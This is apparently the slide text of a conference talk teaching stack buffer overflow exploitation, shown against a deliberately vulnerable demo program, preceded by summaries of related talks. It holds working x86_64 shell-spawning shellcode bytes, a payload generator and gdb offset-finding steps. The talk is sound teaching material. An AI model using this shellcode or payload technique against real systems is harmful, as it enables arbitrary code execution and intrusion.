This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" of vulnerable programs through memory manipulation. It then walks through developing a stack buffer overflow exploit against a vulnerable C program. Various compiler protections like stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program to automate writing an exploit string to trigger the vulnerability and redirect execution.
Security vulnerabilities and secure coding are often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through a simple exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as another programming tool. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Security vulnerabilities and secure coding are often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Software Vulnerabilities in C and C++ (CppCon 2018) - Patricia Aas
What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.
Thoughts On Learning A New Programming Language - Patricia Aas
How should we teach a new language to folks that already know how to program?
How do we use what we already know to leapfrog the learning process?
Based on my personal experience and snippets of natural language theory, we will try to explore the cheats and pitfalls when learning a new programming language, but also dig into how we can make it easier.
The Anatomy of an Exploit (NDC TechTown 2019) - Patricia Aas
Security vulnerabilities and secure coding are often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it’s developed and how it’s used.
The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Secure Programming Practices in C++ (NDC Oslo 2018) - Patricia Aas
Bjarne Stroustrup, the creator of C++, once said: “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” He has also said: “Within C++, there is a much smaller and cleaner language struggling to get out.” Both are true.
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. Motivated by going through well known vulnerability patterns that have been used in exploits for decades, we will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blow your whole leg off”.
Undefined Behavior and Compiler Optimizations can result in programs that display surprising behavior. In this presentation we look at some examples, and I hope to convince you that you should not reason about Undefined Behavior and that you should take care and use your tools.
Secure Programming Practices in C++ (NDC Security 2018) - Patricia Aas
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. We will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blow your whole leg off”.
Chromium Sandbox on Linux (NDC Security 2019) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The document discusses various programming language concepts and how they are implemented in C# compared to other languages like C++. It provides code examples of concepts like namespaces, operator overloading, optional arguments, structs, properties, and delegates in C# and compares them to their implementation in C++ or other languages. It emphasizes finding the similarities between languages but also pointing out differences or potential "false friends" where the implementation or semantics have drifted from the original.
Reading Other Peoples Code (Web Rebels 2018) - Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other people's code. Is there a way to methodically read and understand other people's work, build their mental models? In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Isolating GPU Access in its Own Process - Patricia Aas
Chromium's process architecture has graphics access restricted to a separate GPU-process. There are several reasons why this could make sense, three common ones are: Security, Robustness and Dependency Separation.
GPU access restricted to a single process requires an efficient framework for communication over IPC from the other processes, and most likely a framework for composition of surfaces. This talk describes both the possible motivations for this kind of architecture and Chromium's solution for the IPC framework. We will demonstrate how a multi-process program can compose into a single window on Linux.
Exploit Research and Development Megaprimer: Win32 Egghunter - Ajin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Chromium Sandbox on Linux (BlackHoodie 2018) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Introduction to Memory Exploitation (CppEurope 2021) - Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
This document discusses Cisco IOS shellcoding and reverse engineering. It covers topics like Cisco IOS shellcodes that are image-independent by disassembling or interrupting hijacking. It also discusses Tcl shellcodes, Cisco IOS reverse engineering challenges including lack of modularity and APIs. The document details subsystems, registries, processes, command parser tree, debugging Cisco IOS, and magic numbers used in Cisco IOS.
The document discusses how to publish a Perl 6 module. It covers creating modules, writing tests, documenting metadata, installing modules locally or via package managers like panda, and releasing modules to the ecosystem. Key steps include writing Perl 6 code and tests, adding metadata, testing the metadata, pushing to GitHub, and publishing releases to the ecosystem.
DEF CON 23 - COLIN O'FLYNN - dont whisper my chips - Felipe Prado
This document summarizes a presentation given by Colin O'Flynn at DEFCON 2015 about physical layer attacks. The objective of the presentation was to teach about various physical layer attacks and show that the tools used are open source and freely available. Many of the hardware tools are commercially available but can also be homemade. The presentation covered topics like side-channel analysis, fault injection, and cryptography attacks on embedded devices and discussed tools like the ChipWhisperer for performing analyses. Code and documentation for the tools are available on the listed websites.
Linux Security APIs and the Chromium Sandbox - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
The document provides an overview of basic penetration testing techniques including buffer overflow vulnerabilities, return oriented programming (ROP), format string vulnerabilities, and ways to bypass data execution prevention (DEP) and address space layout randomization (ASLR). It discusses stack-based buffer overflows, the structure of the x86 stack, overwriting the return address, and controlling the instruction pointer. It also covers ROP techniques like ret2libc, gadgets, chaining, and using libc functions. Finally, it briefly mentions tools like pwntools, ROPgadget, and techniques like IO wrapping and LD_PRELOAD hijacking.
Better detection of what modules are used by some Perl 5 code - charsbar
This document discusses Perl::PrereqScanner::NotQuiteLite, a module that detects which modules are used by Perl 5 code in a more accurate way than existing tools. It summarizes that Perl::PrereqScanner::NotQuiteLite can detect module requirements across a wide range of frameworks and syntax, including Moose, Catalyst, and Test::More. It also migrates the detection of module requirements from Perl::PrereqScanner to Perl::PrereqScanner::NotQuiteLite and describes how to update CPAN files and test them based on the module usage detected.
The document contains multiple choice questions about PHP. It tests knowledge of concepts like sessions, arrays, streams, static methods, and security best practices. Key topics covered include the Observer pattern, auto-incrementing keys, extracting arrays, sorting arrays by value, stream metadata, blocking streams, and array intersection.
C++ for Java Developers (JavaZone 2017) - Patricia Aas
The document is a presentation on C++ for Java developers. It introduces C++ concepts like classes, references, pointers, memory management and standard libraries. It emphasizes using modern C++ features like the stack instead of heap for memory, values instead of pointers, and standard libraries. It summarizes that developers should use modern C++ practices like values, references, const, and libraries, but most importantly not use raw pointers like "Banana * b = new Banana();".
This document discusses bypassing address space layout randomization (ASLR) protections to execute shellcode on the stack. It begins with an overview of stack-based buffer overflows and modern protections like non-executable stacks. It then describes using return-oriented programming (ROP) techniques like ret2libc to hijack control flow and call library functions like system() to spawn a shell. Specifically, it outlines overwriting a return address to call mprotect() to make the stack executable, then jumping to shellcode on the stack. The document provides example exploit code and steps to find needed addresses in memory.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
Introduction to Memory Exploitation (Meeting C++ 2021) - Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old. We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
There is hardly a senior Java developer who has never heard of sun.misc.Unsafe. Though it has always been a private API intended for JDK internal use only, the popularity of Unsafe has grown too fast, and now it is used in many open-source projects. OK.RU is not an exception: its software also heavily relies on Unsafe APIs.
During this session we'll try to understand what is so attractive about Unsafe. Why do people keep using it regardless of the warnings of removal from future JDK releases? Are there any safe alternatives to the private API, or is it absolutely vital? We will review the typical cases in which Java developers prefer to go unsafe and discuss the major benefits and drawbacks of doing so. The talk will be supported by real examples from OK.RU's experience.
The Square Register Android app does not crash. Well... almost never!
The magic recipe? Combine an aggressive approach to collecting metadata with precise monitoring. Come and discover the tools and techniques that let us develop an app that handles payments without being scared to death!
http://www.mix-it.fr/session/3532/
Vagrant is a well-known tool for creating development environments in a simple and consistent way. Since we adopted it in our organization we have experienced several benefits: lower project setup times, better shared knowledge among team members, fewer wtf moments ;-)
In this session we’d like to share our experience, including but not limited to:
- advanced Vagrantfile configuration
- VM configuration tips for dev environments: performance, debug, tuning
- our wtf moments
- puphpet/phansible: hot or not?
- packaging a box
This document discusses the use of deterministic simulation to test distributed systems. It describes how Flow, a programming language extension to C++, can be used to simulate concurrency and external communications deterministically. This allows debugging a simulation instead of the live distributed system. Key aspects of the simulation include single-threaded pseudo-concurrency, simulating external connections and files, and ensuring all control flow is deterministic based only on inputs. The simulator is used to run tests and simulated disasters to uncover bugs in a more efficient manner than real world testing alone.
seccomp is a computer security facility in the Linux kernel, pledge is a similar security facility in the OpenBSD kernel. In this presentation Giovanni Bechis will review the development story and progress of both kernel interfaces and will analyze the main differences. There will be some examples of implementations of security patches made for some important open source projects.
Return Oriented Programming, an introduction - Patricia Aas
Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of.
In this talk you will learn how it works, and we will go through how it can be used to execute code in contexts where the stack is not executable.
The document discusses code for serial port (com) device drivers in FreeBSD. It shows code from the comstart() function, which is called by the tty layer when there is outgoing data to transmit. Comstart() grabs the data from the tty queue and sets up the com_softc structure to start transmission. It then calls the chip-specific transmit function. The com_softc structure contains a pointer to the associated tty structure.
The document discusses weaknesses in random number generation and pseudorandom number generation (PRNG) that can be exploited by attackers. It provides examples of programs that used weak PRNGs, allowing session IDs and keys to be guessed. Lessons learned are that numbers used to derive keys and IDs must be truly random and unpredictable, and PRNGs must be cryptographically secure. Two types of randomness are defined: true randomness from unpredictable sources, and pseudorandomness from cryptographically secure PRNGs seeded with true randomness.
The Anatomy of an Exploit (NDC TechTown 2019)
11. $ clang -o launch launch.c
launch.c:19:3: warning: implicit declaration of function 'gets' is invalid in C99 [-Wimplicit-function-declaration]
      gets(response);
      ^
1 warning generated.
/tmp/launch-0d1b0f.o: In function `authenticate_and_launch':
launch.c:(.text+0x5e): warning: the `gets' function is dangerous and should not be used.
CWE-242: Use of Inherently Dangerous Function
Two separate warnings: the compiler reports that gets has no declaration (C11 removed gets from the standard, and glibc's <stdio.h> no longer declares it in C11 mode), and the linker flags gets itself, because it has no way to bound the write into response.
@pati_gallardo
26. CMakeLists.txt
# Wargames C++
# -------------------------
add_executable(launch_cpp src/launch.cpp)
Start from scratch with C++
48. Shellcode - code that gives you shell
int execve(const char *filename,
           char *const argv[],
           char *const envp[]);
Target process before: the vulnerable program. Target process after the shellcode runs: /bin/sh, which replaces the program image via execve.
51. Write direction vs stack growing direction
Address   Contents
100       char[5]: "ret" address -> 95
99        char[4]: No-op
98        char[3]: No-op
97        char[2]: No-op
96        char[1]: Shellcode
95        char[0]: Shellcode
The stack grows toward lower addresses, but the buffer is filled, and instructions are executed, toward higher addresses: the overwritten return address sits at the high end of the buffer and points back down to its start (95), where the shellcode begins.
52. stack_overflow_exploit.c
Basic structure of the exploit code: the shellcode first, then a no-op pad up to the saved return address, then the address of the buffer written over the return address.

#include <stdio.h>

int main(void) {
  char shellcode[] = "";                 // Filled in later: the bytes to execute
  size_t shellcode_size = (sizeof shellcode) - 1;
  int offset = 0;                        // We need to find the return addr offset
  int padded_bytes = offset - shellcode_size;
  {
    fwrite(shellcode, 1, shellcode_size, stdout);
  }
  {
    char pad[] = "\x90";                 // No-ops (x86 NOP, 0x90)
    for (int i = 0; i < padded_bytes; i++)
      fwrite(pad, 1, 1, stdout);
  }
  {
    // We need to find the address of the buffer. Six bytes, little-endian,
    // are enough: a user-space x86_64 address fits in 48 bits and the two
    // high bytes of the saved return address are already zero.
    char addr[] = "";
    fwrite(addr, 1, 6, stdout);
  }
  putchar('\0');                         // Trailing zero byte after the address
}
53. stack_overflow_exploit.c (same code as slide 52). What we need to know: the offset of the return address from the buffer on the stack, and the address of the buffer in memory.
54. launch_bigger.cpp
Let's make some changes to make it easier: a bigger buffer, and print its address.

#include <cstdio>
#include <cstring>
#include <iostream>

void launch_missiles(int n) {
  printf("Launching %d missiles\n", n);
}

void authenticate_and_launch(void) {
  int n_missiles = 2;
  bool allowaccess = false;
  char response[110];
  printf("%p\n", (void *)&response);   // Leak the buffer address (for the demo)
  printf("Secret: ");
  std::cin >> response;                // Unbounded read into response
  if (strcmp(response, "Joshua") == 0)
    allowaccess = true;
  if (allowaccess) {
    puts("Access granted");
    launch_missiles(n_missiles);
  }
  if (!allowaccess)
    puts("Access denied");
}

int main(void) {
  puts("WarGames MissileLauncher v0.1");
  authenticate_and_launch();
  puts("Operation complete");
}

The overflow relies on std::cin >> response being unbounded, which holds for C++17 and earlier; C++20 replaced the char* overload with an array overload that stops after sizeof(response) - 1 characters, so this demo has to be built with a pre-C++20 language standard.
56. Metasploit pattern_create and pattern_offset
Used to find the offset of the return pointer from the start of the buffer.
pattern_create: creates a string of non-repeating character sequences.
pattern_offset: given a sequence taken from that string (for example the value found in a register or on the stack after the crash), returns its offset in the string.
57. Find the offset of the return address
$ pattern_create -l 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
$ clang++ -z execstack -fno-stack-protector -o launch_bigger launch_bigger.cpp
$ gdb -q ./launch_bigger
(gdb) br *authenticate_and_launch+205
Breakpoint 1 at 0x4008dd
(gdb) r
Starting program: ./launch_bigger
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
Access granted
Launching 1698771301 missiles
Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() ()
(gdb) x/1xg $sp
0x7fffffffdd18: 0x3765413665413565
(gdb) q
$ pattern_offset -q 3765413665413565
[*] Exact match at offset 136
The breakpoint is on the function's ret, so $sp points at the saved return address. Read back little-endian, the 8 bytes there spell "e5Ae6Ae7", which occurs 136 bytes into the pattern: the return address is 136 bytes past the start of response (and indeed 0x7fffffffdd18 - 0x7fffffffdc90 = 0x88 = 136). "Access granted" and the absurd missile count show that allowaccess and n_missiles were overwritten by the pattern on the way.
Known now: the offset of the return address from the buffer on the stack (136) and the address of the buffer in memory (0x7fffffffdc90, printed by the program).
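An implementation of the two Metasploit tools, added here as an example (it is not part of the talk and not Metasploit's own code) to make the gdb session above reproducible in plain C: pattern_create emits the cyclic "Aa0Aa1..." string, and pattern_offset takes the 64-bit word exactly as gdb's x/1xg prints it, converts it back to the bytes as they sit in memory, and finds them in the pattern. Run on the value from the session, 0x3765413665413565, it returns 136, the same offset pattern_offset -q reported.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Metasploit-style cyclic pattern: for each upper-case letter, each
 * lower-case letter and each digit, emit the 3-byte group "Uld", giving
 * "Aa0Aa1...Aa9Ab0...". Any 4 consecutive bytes occur only once in the
 * 26*26*10*3 = 20280-byte period, so a value read back from a register
 * or the stack maps to exactly one offset. Writes len bytes plus a NUL
 * into out (capacity cap); returns len, or 0 if it does not fit.
 */
size_t pattern_create(char *out, size_t cap, size_t len)
{
    if (len + 1 > cap || len > 26 * 26 * 10 * 3)
        return 0;
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                char grp[3] = { (char)u, (char)l, (char)d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = grp[i];
            }
    out[n] = '\0';
    return n;
}

/*
 * pattern_offset for a value dumped as one 64-bit little-endian word
 * (what gdb's x/1xg shows): rebuild the bytes in memory order, then
 * locate them in the pattern. Returns the offset, or -1 if absent.
 */
long pattern_offset(const char *pattern, size_t plen, uint64_t value)
{
    unsigned char needle[8];
    for (int i = 0; i < 8; i++)
        needle[i] = (unsigned char)(value >> (8 * i));   /* low byte first */
    for (size_t off = 0; off + 8 <= plen; off++)
        if (memcmp(pattern + off, needle, 8) == 0)
            return (long)off;
    return -1;
}

/* Convenience: pattern of length len (up to 1023), value as gdb printed it. */
long offset_in_pattern(size_t len, uint64_t value)
{
    char buf[1024];
    size_t n = pattern_create(buf, sizeof buf, len);
    return n ? pattern_offset(buf, n, value) : -1;
}

int main(void)
{
    char buf[256];
    size_t n = pattern_create(buf, sizeof buf, 150);
    printf("%s\n", buf);
    printf("offset of 0x3765413665413565: %ld\n",
           pattern_offset(buf, n, 0x3765413665413565ULL));
    return 0;
}
```

If the word gdb shows is not found (-1), the overwrite came from somewhere other than the pattern, for example a register that still held the original return address; then the bytes have to be traced rather than looked up.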
68. New Idea! Try to close STDIN and reopen the tty first.
When the exploit is delivered as ./launch_bigger < file, fd 0 is the payload file, so a shell started by the shellcode would read EOF from its stdin and exit at once. Closing fd 0 and then opening /dev/tty makes the lowest free descriptor, 0, the terminal again before execve runs.
69. Steps: write C code for the shellcode; compile it; rewrite it as inline assembly, eliminating zero bytes; put the bytes in a char buffer; put the jump address on the return address.
72. Build it statically, with no canary
wargames$ clang -save-temps -Os -static -fno-stack-protector -o shellcode shellcode.c
wargames$ ./shellcode
$
wargames$ ldd shellcode
not a dynamic executable
-static keeps libc out of the picture so the binary contains the raw system calls, and -save-temps keeps the generated assembly (shellcode.s), the starting point for the hand-written version on the following slides.
77. shellcode_asm.c
// --------------------------------------------------------
// close
// --------------------------------------------------------
"xor %rdi, %rdi\n\t"   // Zero out rdi - without using 0 (fd 0 = stdin)
"xor %rax, %rax\n\t"   // Zero out rax - without using 0
"mov $0x3, %al\n\t"    // Write the syscall number (3) to al
"syscall\n\t"          // Do the syscall

%rax   #   System call   %rdi
0x3    3   sys_close     unsigned int fd
79. shellcode_asm.c
// --------------------------------------------------------
// open
// --------------------------------------------------------
"xor %rax, %rax\n\t"                    // Zero out rax - without using 0
"push %rax\n\t"                         // Push a string terminator
"movabs $0x7974742f7665642f, %rbx\n\t"  // Put the string in rbx:
                                        // /dev/tty = 2f 64 65 76 2f 74 74 79 (little-endian)
"push %rbx\n\t"                         // Push rbx on the stack
"mov %rsp, %rsi\n\t"                    // Put a pointer to the string in rsi
"xor %rdx, %rdx\n\t"                    // Zero out rdx - without using 0 (flags = O_RDONLY)
"xor %rdi, %rdi\n\t"                    // Zero out rdi - without using 0 (dfd, ignored for an absolute path)
"xor %r10, %r10\n\t"                    // Zero out r10 - without using 0 (mode)
"mov $0x101, %eax\n\t"                  // Write the syscall number (257)
"syscall\n\t"                           // Do the syscall; the new fd takes the lowest free number, 0

%rax    #     System call   %rdi      %rsi                   %rdx        %r10
0x101   257   sys_openat    int dfd   const char *filename   int flags   int mode
81. shellcode_asm.c
// --------------------------------------------------------
// execve
// --------------------------------------------------------
"xor %rdx, %rdx\n\t"                    // Zero out rdx - without using 0 (envp = NULL)
"xor %rax, %rax\n\t"                    // Zero out rax - without using 0
"push %rax\n\t"                         // Push a string terminator
"movabs $0x68732f2f6e69622f, %rbx\n\t"  // Put the string in rbx:
                                        // /bin//sh = 2f 62 69 6e 2f 2f 73 68 (the doubled slash
                                        // pads the path to 8 bytes without a zero byte)
"push %rbx\n\t"                         // Push rbx on the stack
"mov %rsp, %rdi\n\t"                    // Put a pointer to the string in rdi
"push %rdx\n\t"                         // Push a null to terminate the array
"push %rdi\n\t"                         // Push the pointer to the string
"mov %rsp, %rsi\n\t"                    // Put a pointer to argv in rsi
"mov $0x3b, %al\n\t"                    // Write the syscall number 59 to al
"syscall\n\t"                           // Do the syscall

%rax   #    System call   %rdi                   %rsi                       %rdx
0x3b   59   sys_execve    const char *filename   const char *const argv[]   const char *const envp[]
82. Compile and test the assembly ✔
wargames$ clang -o shellcode_asm shellcode_asm.c
wargames$ ./shellcode_asm
$
84. shellcode_asm.c
// --------------------------------------------------------
// open
// --------------------------------------------------------
"xor %rax, %rax\n\t"                    // Zero out rax - without using 0
"push %rax\n\t"                         // Push a string terminator
"movabs $0x7974742f7665642f, %rbx\n\t"  // Put the string in rbx:
                                        // /dev/tty = 2f 64 65 76 2f 74 74 79
"push %rbx\n\t"                         // Push rbx on the stack
"mov %rsp, %rsi\n\t"                    // Put a pointer to the string in rsi
"xor %rdx, %rdx\n\t"                    // Zero out rdx - without using 0
"xor %rdi, %rdi\n\t"                    // Zero out rdi - without using 0
"xor %r10, %r10\n\t"                    // Zero out r10 - without using 0
"mov $0x101, %eax\n\t"                  // Write syscall number 257 to eax
"syscall\n\t"                           // Do the syscall

%rax    #     System call   %rdi      %rsi                   %rdx        %r10
0x101   257   sys_openat    int dfd   const char *filename   int flags   int mode
The one remaining problem is mov $0x101, %eax: its encoding is b8 01 01 00 00, and the two zero bytes would terminate the string when the bytes are copied into the buffer.
85. shellcode_asm.c: write 255 and inc it twice
"mov $0xFF, %al\n\t"     // Write 255 to al (b0 ff, no zero byte); rax was zeroed above, so rax = 255
"inc %rax\n\t"           // 256
"inc %rax\n\t"           // 257 = sys_openat
//"mov $0x101, %eax\n\t" // Write syscall number 257 to eax (b8 01 01 00 00: two zero bytes)

%rax    #     System call   %rdi      %rsi                   %rdx        %r10
0x101   257   sys_openat    int dfd   const char *filename   int flags   int mode
90. Compile and test the shellcode bytes ✔
$ clang -z execstack -o shellcode_test shellcode_test.c
$ ./shellcode_test
len:77 bytes
$
The 77 bytes now live in a char buffer and are executed from there, hence -z execstack; the shell prompt shows the bytes still work after the round trip through a string.
92. Use the exploit in gdb ✔
wargames$ clang -o shellcode_exploit shellcode_exploit.c
wargames$ ./shellcode_exploit > file
wargames$ gdb -q ./launch_bigger
(gdb) r < file
Starting program: ./launch_bigger < file
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret: Access denied
process 29337 is executing new program: /bin/dash
$
The secret check fails ("Access denied"), but when authenticate_and_launch returns it jumps to the buffer address written over its return slot, the shellcode runs, and /bin/sh (dash on this system) is executed with the terminal reopened as stdin.
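The shellcode and payload from the slides put together in one generator, added here as an example and not the talk's shellcode_exploit.c. The byte encodings were hand-assembled from the instructions on slides 77, 79, 81 and 85 (an assumption to verify against your own clang -save-temps output; their total, 77 bytes, matches the len:77 printed on slide 90). The layout follows stack_overflow_exploit.c from slide 52, with the offset 136 and buffer address 0x7fffffffdc90 from the gdb session on slide 57. count_bad_bytes is the check behind the zero-byte elimination step, extended to the whitespace bytes at which std::cin >> response would stop reading.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * The close / openat / execve sequence from the slides, hand-assembled
 * (x86_64; the movabs immediates are "/dev/tty" and "/bin//sh").
 */
static const unsigned char shellcode[] = {
    /* close(0) */
    0x48, 0x31, 0xff,                   /* xor %rdi, %rdi   */
    0x48, 0x31, 0xc0,                   /* xor %rax, %rax   */
    0xb0, 0x03,                         /* mov $0x3, %al    */
    0x0f, 0x05,                         /* syscall          */
    /* openat(0, "/dev/tty", 0, 0): lowest free fd is 0 again */
    0x48, 0x31, 0xc0,                   /* xor %rax, %rax   */
    0x50,                               /* push %rax        */
    0x48, 0xbb, 0x2f, 0x64, 0x65, 0x76, 0x2f, 0x74, 0x74, 0x79, /* movabs "/dev/tty", %rbx */
    0x53,                               /* push %rbx        */
    0x48, 0x89, 0xe6,                   /* mov %rsp, %rsi   */
    0x48, 0x31, 0xd2,                   /* xor %rdx, %rdx   */
    0x48, 0x31, 0xff,                   /* xor %rdi, %rdi   */
    0x4d, 0x31, 0xd2,                   /* xor %r10, %r10   */
    0xb0, 0xff,                         /* mov $0xff, %al   */
    0x48, 0xff, 0xc0,                   /* inc %rax         */
    0x48, 0xff, 0xc0,                   /* inc %rax (257)   */
    0x0f, 0x05,                         /* syscall          */
    /* execve("/bin//sh", {"/bin//sh", NULL}, NULL) */
    0x48, 0x31, 0xd2,                   /* xor %rdx, %rdx   */
    0x48, 0x31, 0xc0,                   /* xor %rax, %rax   */
    0x50,                               /* push %rax        */
    0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, /* movabs "/bin//sh", %rbx */
    0x53,                               /* push %rbx        */
    0x48, 0x89, 0xe7,                   /* mov %rsp, %rdi   */
    0x52,                               /* push %rdx        */
    0x57,                               /* push %rdi        */
    0x48, 0x89, 0xe6,                   /* mov %rsp, %rsi   */
    0xb0, 0x3b,                         /* mov $0x3b, %al   */
    0x0f, 0x05,                         /* syscall          */
};

/* The encoding slide 85 replaces: mov $0x101, %eax carries two zero bytes. */
static const unsigned char mov_eax_257[] = { 0xb8, 0x01, 0x01, 0x00, 0x00 };

size_t shellcode_len(void) { return sizeof shellcode; }

/* Bytes a string-based reader treats as terminators: NUL (gets-style
 * copies stop there) and the whitespace at which std::cin >> char* stops. */
size_t count_bad_bytes(const unsigned char *p, size_t n)
{
    size_t bad = 0;
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0 || p[i] == ' ' || (p[i] >= '\t' && p[i] <= '\r'))
            bad++;
    return bad;
}

/*
 * Same layout as stack_overflow_exploit.c: shellcode, NOP pad up to
 * ret_offset, the low 6 bytes of the buffer address little-endian, then
 * one zero byte. Returns the payload length, or 0 if the shellcode does
 * not fit before the return address or out is too small.
 */
size_t build_payload(size_t ret_offset, uint64_t buf_addr,
                     unsigned char *out, size_t cap)
{
    size_t total = ret_offset + 6 + 1;
    if (sizeof shellcode > ret_offset || total > cap)
        return 0;
    memcpy(out, shellcode, sizeof shellcode);
    memset(out + sizeof shellcode, 0x90, ret_offset - sizeof shellcode);
    for (int i = 0; i < 6; i++)
        out[ret_offset + i] = (unsigned char)(buf_addr >> (8 * i));
    out[ret_offset + 6] = 0;
    return total;
}

int main(void)
{
    /* Values from the gdb session: offset 136, buffer at 0x7fffffffdc90. */
    unsigned char payload[256];
    size_t n = build_payload(136, 0x7fffffffdc90ULL, payload, sizeof payload);
    fprintf(stderr, "shellcode %zu bytes (%zu terminator bytes), payload %zu bytes\n",
            shellcode_len(), count_bad_bytes(shellcode, shellcode_len()), n);
    fwrite(payload, 1, n, stdout);      /* ./gen > file; ./launch_bigger < file */
    return 0;
}
```

Run count_bad_bytes over the whole payload, not just the shellcode: a buffer address or an offset that happens to contain 0x0a or 0x20 would be cut short by the same reader, and the failure then looks like a wrong offset rather than a bad byte.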
104. Resources
Linux system call table for x86_64: http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
Hex to decimal converter: https://www.rapidtables.com/convert/number/hex-to-decimal.html
ASCII to hex: https://www.asciitohex.com
Weird machines, exploitability, and provable unexploitability, Thomas Dullien / Halvar Flake: https://vimeo.com/252868605